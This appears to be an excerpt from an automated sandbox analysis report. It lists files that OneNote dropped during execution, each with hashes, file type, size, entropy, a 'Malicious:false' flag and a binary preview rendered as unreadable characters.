                                                                                                                                                                                                              SSDEEP:48:KOs0sCzcCuu8to1JqEyrCQpcXbc9Q2wNeTonrdSrDdIMdX0N0QQOC/R:KD0sPCuu8aGEyreXY9Q2rT+RKJvl
                                                                                                                                                                                                              MD5:4C2BC3C07B314BB68521163BB39B7F0A
                                                                                                                                                                                                              SHA1:E88156D9131AB3C3B6F1EA92DE084C995BDE3C68
                                                                                                                                                                                                              SHA-256:3F10D627737E25AD0BE58B1C8E55B6A0BFD03215B974073AA61787175F648B50
                                                                                                                                                                                                              SHA-512:E419B665A69D45BB058EEDFD3AE7D2FDD5D11F6CD254ACC678317E379BD748C6BCB70E17617D79FF00CBA9887FF86ECEE1FFF65524D702A8E9003F1A14D06EA5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ............z.....e......z.....e.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................4..$.$E.....N...^..................M...M.?JAc~..........f........................................I.qk..B.....LZ....................4..$.$E.................4..$.$E.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.1508431357635445
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:vsSdcv29tgAsEJlCDMXHW9HGsJqx516TovrdSrNI0dXgB6mabf4xf:vsBv29yZEX1X29mswL16TGRKhdB4x
                                                                                                                                                                                                              MD5:9A56F9BBE1294283EF2752338A5EFB81
                                                                                                                                                                                                              SHA1:F50BDBB1D307345CA43481ED9BC32BC2436BDF83
                                                                                                                                                                                                              SHA-256:FEC0D1868BF3FCF4A36F1B6FD38972931A6F62496FBC12B04C7F8CAAD7255C76
                                                                                                                                                                                                              SHA-512:61A940CD12E2B22983432C74EDB0A9EB067861A6FBE8D33BF3F67CA835C7EC661F8C9E73DF6F9DC0DB71933B657C67A040C0769999C07AA1CFDA16BDA47C25CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......(...v.......................................................................................................................................2...>...........v...P............................I.......I.qk..B.....LZ.i......i..o.......c...i..o.......c...i..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. ...r..,..`.|.[....N...^................?.....J..h.7..........f........................................I.qk..B.....LZ............ ...r..,..`.|.[........ ...r..,..`.|.[..........i......i......i..........................................ij.....iT.]...i......i..B...iH.....i..B...i..>.).i..J...................;........4...4...4.."...............i..i..i..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........i......i....#.i............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):3.5622838651192055
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:LhAo0kXD3fWLCEqj8mEG4IaE1c4IQcleH4IC9DBY:pTuLqYDO31UJleXC
                                                                                                                                                                                                              MD5:C5165B09BD3CE18A9E77DE8A4B333FD9
                                                                                                                                                                                                              SHA1:08A0C7AF63CE637E62C9DDDE40EE30A9D5E045C7
                                                                                                                                                                                                              SHA-256:60B08430A2A49E03BE7634A804DEA32B52D70B40BF473122E3433800E3416BF6
                                                                                                                                                                                                              SHA-512:5114B785CF34E9F8B029E22B3A64F304B34E767A8822E5E744AAC270E248957516150B2F94A452D89638DE7DA67C1F79B8D78BEBFFF57150A3BAF8335D933287
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:\...L...............................................................................................?...................................................\...L...............,....................................Dm....L..@C..{8......{8...dB.~..../xJ......j|.+&..J...6W_l$7../Oa.E...6W_..e..A_..#.19#s.T.e............T.......T...................................................x.......x.Ai.J....W...T.......T.(....7......2...........^.......0...........{8....M...l...x.J.../....e.......{8.T./....MT.v....lT......xT)....T.......T..."...T...n../..T)O........l...../....c..,0...e...B4.$...........GP..A..}.....J....................{8...dB.~..../x{8.....N$..F.[.E......../..|].cH.8....{v/.......>................e..A_..#.19#s.T.'}^]...),..r.N./..|].cH.8....{...........0...........e....4.............."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w.......B.^....F...r.QH.....(...........(..."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):4.61047709092048
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:znP0FMN+88RgycRtPPX3lsWJdTZaaO607Lmij+uZvs9ONnuQVNgaq9UVBs7:znP0GN+RaycRlPX3lsWJdTZaaO60vmio
                                                                                                                                                                                                              MD5:650776E675645D8B1014E467EE7CB896
                                                                                                                                                                                                              SHA1:6BC0EFD6878EC41C4D112E6310C5168573DACFCA
                                                                                                                                                                                                              SHA-256:3BDB263C4126EF6E7544AF1C7D6EEC66A0BC2FFEA925BD2E0A844F7C15D089E1
                                                                                                                                                                                                              SHA-512:CF4A9D76004223A33D4116040441793D589E0C58731A8F88016D14C4D13ACCEC41BC0737CB80640320F74A6B56CE5ACAAFE994FC51E7DCEE7CDA37AD0C1A4B61
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>...........v........@..X ...I..........>...T.......v.......PH..X ...H..................................................................................>...`.......v........H..X ...I...............I.......I.qk..B.....LZ............<...7z.JqcJ.....<...7z.JqcJO.....A6ME.S./..D....A6..I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'.............Qh.X.*...`.........N...^...............+.>..zA.....1W.................................................I.qk..B.....LZ............Qh.X.*...`...................................................................................................A6(.W...A6(._...A6 .....A6$.....A6 .....A6$.....A6 ...".A6(.~...............;........4...4...4............'...D.....z...,4. .......$>........4....7..........................3.........................z...y.. x.. ........ ..$...$........&..$!..7!..7.........*...o.e.L.o.c.I.D...o.e.L.o.c
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22203
                                                                                                                                                                                                              Entropy (8bit):6.977175130747846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                              MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                              SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                              SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                              SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):3.9969532594177934
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:UsQpa99YlNBg7pzeHWVNwwXgNIRR/EW5:pQpa/YlNWIWVNwagNgR/T
                                                                                                                                                                                                              MD5:20BC526CF7EE06A9B49D2F22216AEEF5
                                                                                                                                                                                                              SHA1:01650DEB31387941B18BCC844E10348337B3B25D
                                                                                                                                                                                                              SHA-256:5129CC3A1E551EC498CEB44D1D8EEB981993DE8DE0B94BAFD7A4089B6E761170
                                                                                                                                                                                                              SHA-512:46D26CFB9038A95DFC3320809F53CB61AD90E7AAC57A9DE4A7BF7D9111C54D838A9F715B42B2C0E4359F1040EE28AE5F776D53B74580DD97916DABA57BB81326
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>.......j...v...6............................I.......I.qk..B.....LZ.cl.)....clnm.....l..oU..clnm.....l..oU..cl..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................;@8...7.....N...^................:/.../A....@&bd...........@&....................................I.qk..B.....LZ....................;@8...7.................;@8...7...........cl......cl......cl..........................................clj.....clT)Z...cl..2...cl......clH.....cl..J.$.cl$.z.%.cl..0...............;........4...4...4..............z...........................;...!..7......................C.a.l.i.b.r.i.................z.......R...................!..7............S.y.m.b.o.l...................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52945
                                                                                                                                                                                                              Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                              MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                              SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                              SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                              SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.5027758512164513
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:LsLK7b8EH1x5VSG9QxXvA3OIw/D14l1BCXvxjXHRd8CURta9/5u:wzEH1x5VS2QxXoe/wWXvxbxdnURtis
                                                                                                                                                                                                              MD5:ABED842B41E20542F7AEA29335C8E6BF
                                                                                                                                                                                                              SHA1:3430F1FF50F00634D00C7B628312803E246B0DC6
                                                                                                                                                                                                              SHA-256:E5253BBA5971AB85C283E04763EFA0B0C159ECB93D24DAA0B36171B01B878714
                                                                                                                                                                                                              SHA-512:B0A17D7B0E907789559A02B88099159FE14E2B758B95A5D217925AA43CF908A8573DB9E87A95C74F131DDE8147A43A0CC5A928F2E12D6CB32B23A1356D0BB9CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>.......0...v................................I.......I.qk..B.....LZ....9.........Q...}..<[[......Q...}..<[[.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............./6.....;...........N...^....................`VD...o...\........"...4...............................b....I.qk..B.....LZ............/6.....;.............../6.....;...............................................................................j.......T.x...............4.....H....... .......$.........j...............;........4...4...4................:...j.....z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0..............:...L.....z...y.. x.. ...........$........!..7!.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25622
                                                                                                                                                                                                              Entropy (8bit):7.058784902089801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                              MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                              SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                              SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                              SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):3.2566598684669295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:dgIRyeOiz8zn82yU83z9zPRSt+CM70ssF9sjnI:dgIRycz8zn82yx3z9zPRu+CM70sE9sjI
                                                                                                                                                                                                              MD5:215F24DFB1189DD3B0F0AAB42E487573
                                                                                                                                                                                                              SHA1:F43C13FEBCB9800630EE9B237F25A2F7A711B955
                                                                                                                                                                                                              SHA-256:97D649253B6F3FCFD9E67D4A4DAFF71D1AB35B18EABA419115738B1DE1F626AD
                                                                                                                                                                                                              SHA-512:F72DB88EED01793B0FAC022FF3894504350E587FD6FB71796600FF5C2FB460EA9D88C5BC530E6172D82692C7BF7E26F7B79DCD5A4342290B9327C152F3F13F84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......r...v.......p ..X/..2...>.......j...v...6....-..x........LZ.............1L..L.@..F.p.|..........1L..L.@..F.p.|.....2...>.......r...v........-..x...........v........-..x....................I.......I.qk..B.....LZ....T..........2....EF........2....EF......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................!)."..E.[......N...^................1L..L.@..F.p.|.........4................1L..L.@..F.p.|..........I.qk..B.....LZ................!)."..E.[..................................................................................................j.......T)y...............4.......a.......l.....$.N.$...$.................;........4...4...4............'...%.........z...,4. ...........$>........4.@!..7..............................D..n4..o4..p4...4. ..u-...............................;........4...4...4............................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15740
                                                                                                                                                                                                              Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                              MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                              SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                              SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                              SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.7837172735185467
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:4sUcqvu4XTNF9tTvMj26mC3sKGL0rmlekqUXuGtSZRtIIyV2xF:tSRXTNntTvMoKI0rmttu2SZRtNycxF
                                                                                                                                                                                                              MD5:7E1AB552DF3DC293B619DF26230B52BA
                                                                                                                                                                                                              SHA1:E19926E735A13D317B2449618A9C91010AB1E0F3
                                                                                                                                                                                                              SHA-256:DC96560AD9AFCFC765016C1D836EAB01166495C9233CD4BFCA2B5E3E8876B955
                                                                                                                                                                                                              SHA-512:370D0BB35A657930A6D14866A1F581EA9F3136E0DC791C647C41A2F03B52DE0193D2A7C8D2D1DF6665C88FCF7E9C27827AE586661FEE69F1BC2000052E81A15F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...h.......v........ .. !..2...>...........v.......@................................................................................................................................................I.......I.qk..B.....LZ....9.........%z..#s .......%z..#s ......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............:+S.a..=..........N...^....................G.E.f.:...............>....................................I.qk..B.....LZ.............:+S.a..=......................................................................................................j.......T.~..............P.....H....... .......$........n...............;........4...4...4................:...j.....z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0..............:...L.....z...y.. x.. ...........$........!..7!.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55804
                                                                                                                                                                                                              Entropy (8bit):7.433623355028275
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                              MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                              SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                              SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                              SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.669180434301248
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ooWsjLHhWqJQrcc2730J2I3Bv8wXg26kZ2K0o7RtNA2WVj3IxU3/9az3B2BC2sq0:LjdWqKrcX0LB7akNRtNWV7Ix+1arZR9m
                                                                                                                                                                                                              MD5:35E6CA85E47D65CC2C7F0B8FB09005A1
                                                                                                                                                                                                              SHA1:7E9F321F7A1CE3485E0C93D44707897DDC264AF4
                                                                                                                                                                                                              SHA-256:0976C98EF59AE773BD57DA337EFB5A42C2249E8CDCB836F04D8B5EE51AD50604
                                                                                                                                                                                                              SHA-512:404F0C94DF294D9E9EF6EF01B1F27544A9CA3D10E8CB3403005F8B7F38602F617BF8D55FAFEB765C6107FC97ADC3A4E906290E53CB071AFBC86A813B32F5310B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:4...>.......N...v..."...( ...+..4...>...........v...j...@....*...........................................................................................................................................I.......I.qk..B.....LZ.L.......L.R.:..0.*"|_...L.R.:..0.*"|_.v.L...I.qk..B.....LZ.I..{E...n.E.b|...{.{E............I.......I...................................................I.t.....I................................................................4..'...'..............8`&...G..]EuB..........f...Z.............1.F`.H..J.........N...^........................................I.qk..B.....LZ..............1.F`.H..J.......................................L.......L.......L..........................................{E...c..{E.(.Z..{E.(.....L.j.....L.T.u...L.......L...2...L...m.......z.......R...................!..7............W.i.n.g.d.i.n.g.s......333..................;........4...4...4..............L.:.L.L.L.Y.L.K.L...z...y.. x.. ........ ..$...$........!..7!..7.........*...o.e.L.o.c.I.D...o.e.L
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41893
                                                                                                                                                                                                              Entropy (8bit):7.52654558351485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                              MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                              SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                              SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                              SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.599641655874727
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:/sb9lfQdUL4kaMlDAuKqK5X7WEXpB/hX3Rt2SFNcAqU9Dya9zjEY1vr1F9dy/xDZ:0rfGUL4TMpAuKqM7lLZX3RtBN9q4DZzM
                                                                                                                                                                                                              MD5:C227438459802741411AAE062435615B
                                                                                                                                                                                                              SHA1:3C6C811F2B8A40E08FF81BF1438D0C2B55FE48CB
                                                                                                                                                                                                              SHA-256:C4253A70E24CA4A93F651AD5ABF6CE8A45629AFCE8F8D17BB7077DD03889EE27
                                                                                                                                                                                                              SHA-512:661224138DED18748083C4DADECA5F017C3550571BBEA1834433D8E03855E46E4C3793D28D085D59DAAD50C13540FBB1CBA29A09986E432FF4D156B0845D6DB6
                                                                                                                                                                                                              Malicious:false
